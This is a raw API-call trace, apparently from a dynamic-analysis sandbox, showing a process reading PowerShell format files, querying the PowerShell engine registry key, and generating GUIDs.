	[0800.026] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.026] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.027] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.027] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.027] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.028] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.028] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.028] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.029] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.029] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.030] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.030] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.033] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.033] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.034] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.034] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.034] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.035] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.047] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.047] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.047] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0xf37, lpOverlapped=0x0) returned 1
	[0800.048] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d617f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d617f*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0800.048] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0800.048] CloseHandle (hObject=0x2f4) returned 1
	[0800.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0800.049] SetErrorMode (uMode=0x1) returned 0x1
	[0800.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0800.050] SetErrorMode (uMode=0x1) returned 0x1
	[0800.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0800.050] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2f4) returned 0x0
	[0800.050] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0800.050] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a1c0
	[0800.051] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a1c0, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0800.051] CoTaskMemFree (pv=0x1ba3a1c0) 
	[0800.051] RegCloseKey (hKey=0x2f4) returned 0x0
	[0800.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0800.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0800.951] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x402954da, Data2=0x8944, Data3=0x439d, Data4=([0]=0x82, [1]=0xfd, [2]=0x9a, [3]=0x89, [4]=0x12, [5]=0x97, [6]=0xdf, [7]=0x3c))) returned 0x0
	[0800.952] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xc19e1070, Data2=0x99dc, Data3=0x4312, Data4=([0]=0xb4, [1]=0x0, [2]=0x65, [3]=0xa, [4]=0x39, [5]=0xa, [6]=0xa9, [7]=0x4f))) returned 0x0
	[0800.965] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x91c79e7, Data2=0xd274, Data3=0x4eef, Data4=([0]=0x82, [1]=0x3, [2]=0x21, [3]=0x85, [4]=0xc4, [5]=0xf1, [6]=0xcc, [7]=0x95))) returned 0x0
	[0800.967] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x255d45fb, Data2=0x1c29, Data3=0x47c8, Data4=([0]=0x8d, [1]=0x57, [2]=0x82, [3]=0xbc, [4]=0xf1, [5]=0x44, [6]=0xdf, [7]=0x78))) returned 0x0
	[0801.935] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x5f44589d, Data2=0x5eb2, Data3=0x4253, Data4=([0]=0xac, [1]=0xdc, [2]=0xbf, [3]=0x61, [4]=0xb8, [5]=0xfd, [6]=0x2f, [7]=0x41))) returned 0x0
	[0801.937] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xabcea97c, Data2=0x61fb, Data3=0x44a2, Data4=([0]=0xb7, [1]=0x64, [2]=0x28, [3]=0x5a, [4]=0x53, [5]=0xdc, [6]=0x77, [7]=0x64))) returned 0x0
	[0801.955] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x76c1a6ed, Data2=0x3ac9, Data3=0x4ef8, Data4=([0]=0x9e, [1]=0x3, [2]=0xc9, [3]=0xd6, [4]=0x69, [5]=0x51, [6]=0xae, [7]=0x2b))) returned 0x0
	[0801.962] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xfe8c1fc9, Data2=0xde3d, Data3=0x426e, Data4=([0]=0xa3, [1]=0x6e, [2]=0x39, [3]=0xbb, [4]=0x1, [5]=0x50, [6]=0x7a, [7]=0x5a))) returned 0x0
	[0801.963] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x64cf53fa, Data2=0x98b5, Data3=0x425d, Data4=([0]=0xa4, [1]=0x66, [2]=0x7f, [3]=0xb0, [4]=0x6e, [5]=0x3, [6]=0x45, [7]=0x21))) returned 0x0
	[0801.964] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf8380e11, Data2=0x8342, Data3=0x40eb, Data4=([0]=0x85, [1]=0xc, [2]=0x6f, [3]=0xa7, [4]=0xd9, [5]=0x2c, [6]=0xbb, [7]=0x6d))) returned 0x0
	[0801.965] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd820c7a0, Data2=0xc535, Data3=0x406e, Data4=([0]=0xad, [1]=0x6, [2]=0x25, [3]=0xf, [4]=0x3, [5]=0x2e, [6]=0x2e, [7]=0xb0))) returned 0x0
	[0801.965] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8f152cf2, Data2=0x6381, Data3=0x4960, Data4=([0]=0xa4, [1]=0x74, [2]=0xfd, [3]=0x4e, [4]=0x9, [5]=0x9d, [6]=0x36, [7]=0xc5))) returned 0x0
	[0801.966] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xa05d701a, Data2=0xb2af, Data3=0x40a3, Data4=([0]=0xb6, [1]=0xee, [2]=0x7c, [3]=0xd2, [4]=0x5b, [5]=0xe2, [6]=0xf7, [7]=0xda))) returned 0x0
	[0801.966] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xadf85345, Data2=0xe3a7, Data3=0x4eb9, Data4=([0]=0xad, [1]=0x98, [2]=0x1c, [3]=0x25, [4]=0x42, [5]=0x8f, [6]=0x12, [7]=0x54))) returned 0x0
	[0801.967] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xbc2930d, Data2=0x6836, Data3=0x4fbe, Data4=([0]=0xba, [1]=0x1c, [2]=0x10, [3]=0x52, [4]=0xe2, [5]=0x96, [6]=0xe7, [7]=0xa7))) returned 0x0
	[0802.836] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xccf4b021, Data2=0xf4e6, Data3=0x48ae, Data4=([0]=0xb2, [1]=0xdd, [2]=0x9, [3]=0x4c, [4]=0xa9, [5]=0xee, [6]=0xf7, [7]=0x40))) returned 0x0
	[0802.843] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xe019b1a2, Data2=0xc727, Data3=0x447f, Data4=([0]=0x98, [1]=0x5d, [2]=0xbd, [3]=0xd8, [4]=0x25, [5]=0x50, [6]=0xa6, [7]=0x1e))) returned 0x0
	[0802.848] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xace8593, Data2=0xe998, Data3=0x4473, Data4=([0]=0xb2, [1]=0x51, [2]=0xdc, [3]=0x45, [4]=0x7a, [5]=0xa4, [6]=0x52, [7]=0xb3))) returned 0x0
	[0802.849] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x6b12c35f, Data2=0x81e0, Data3=0x4154, Data4=([0]=0x8b, [1]=0x32, [2]=0xfd, [3]=0x92, [4]=0x5d, [5]=0xd, [6]=0x7b, [7]=0x2e))) returned 0x0
	[0802.849] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x32296d47, Data2=0x4cac, Data3=0x400f, Data4=([0]=0x95, [1]=0x56, [2]=0x95, [3]=0xf9, [4]=0x44, [5]=0xb8, [6]=0xe5, [7]=0x4b))) returned 0x0
	[0802.850] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8132743f, Data2=0xabf8, Data3=0x4776, Data4=([0]=0xa1, [1]=0xc7, [2]=0x11, [3]=0xd0, [4]=0x50, [5]=0x4a, [6]=0x91, [7]=0xa4))) returned 0x0
	[0802.851] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x1be95399, Data2=0xc8fa, Data3=0x4b66, Data4=([0]=0x8b, [1]=0xb0, [2]=0xab, [3]=0xed, [4]=0xe9, [5]=0x78, [6]=0x3d, [7]=0x7e))) returned 0x0
	[0802.852] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x60501342, Data2=0xe623, Data3=0x416f, Data4=([0]=0x90, [1]=0xf1, [2]=0x29, [3]=0x80, [4]=0xb4, [5]=0xff, [6]=0xc7, [7]=0x68))) returned 0x0
	[0802.852] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x87f4e1eb, Data2=0x5d63, Data3=0x4b88, Data4=([0]=0xb2, [1]=0x5d, [2]=0xe, [3]=0x70, [4]=0x48, [5]=0x17, [6]=0x31, [7]=0x33))) returned 0x0
	[0802.853] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x5b9c12e9, Data2=0x5ec7, Data3=0x4055, Data4=([0]=0x93, [1]=0x2c, [2]=0xbf, [3]=0x58, [4]=0x78, [5]=0xb9, [6]=0x6d, [7]=0x6a))) returned 0x0
	[0802.854] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0802.854] GetFileType (hFile=0x2f4) returned 0x1
	[0802.854] SetErrorMode (uMode=0x1) returned 0x1
	[0802.854] GetFileType (hFile=0x2f4) returned 0x1
	[0802.854] ReadFile (in: hFile=0x2f4, lpBuffer=0x37784a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x37784a8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.855] ReadFile (in: hFile=0x2f4, lpBuffer=0x37784a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x37784a8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.856] ReadFile (in: hFile=0x2f4, lpBuffer=0x37784a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x37784a8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.566] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.566] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.567] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.567] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.567] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.567] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.569] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.569] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.569] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.570] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.570] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.570] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.571] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.571] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.577] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.578] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.578] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.579] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.579] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0xe67, lpOverlapped=0x0) returned 1
	[0803.579] ReadFile (in: hFile=0x2f4, lpBuffer=0x3489e5f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3489e5f*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0803.579] ReadFile (in: hFile=0x2f4, lpBuffer=0x348a850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x348a850*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0803.580] CloseHandle (hObject=0x2f4) returned 1
	[0803.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0803.580] SetErrorMode (uMode=0x1) returned 0x1
	[0803.580] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0803.580] SetErrorMode (uMode=0x1) returned 0x1
	[0803.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0803.581] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2f4) returned 0x0
	[0803.581] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0803.581] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a1c0
	[0803.581] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a1c0, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0803.581] CoTaskMemFree (pv=0x1ba3a1c0) 
	[0803.581] RegCloseKey (hKey=0x2f4) returned 0x0
	[0803.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
